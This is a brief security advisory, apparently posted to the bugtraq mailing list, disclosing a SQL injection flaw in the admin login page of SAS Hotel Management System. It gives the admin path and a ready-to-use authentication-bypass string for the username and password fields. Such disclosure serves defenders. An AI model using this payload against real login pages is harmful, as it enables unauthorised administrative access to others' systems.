[Aria-Security.net] SAS Hotel Management System SQL Injection

From: Advisory@Aria-security.net
To: bugtraq@securityfocus.com
Cc:
Subject: [Aria-Security.net] SAS Hotel Management System SQL Injection
Date:


__________________________

A R I A - S E CU R I T Y  
___________________________

SAS Hotel Management System SQL Injection
http://www.sellatsite.com/sellatsite/hotel.asp


Explanation:

http://path/admin/admin.asp

Username: anything' OR 'x'='x
password: anything' OR 'x'='x



Credits: Aria-Security Team
http://aria-security.net
http://outlaw.Aria-Security.net/ [PERSONAL BLOG]





Copyright © 1995-2018 LinuxRocket.net. All rights reserved.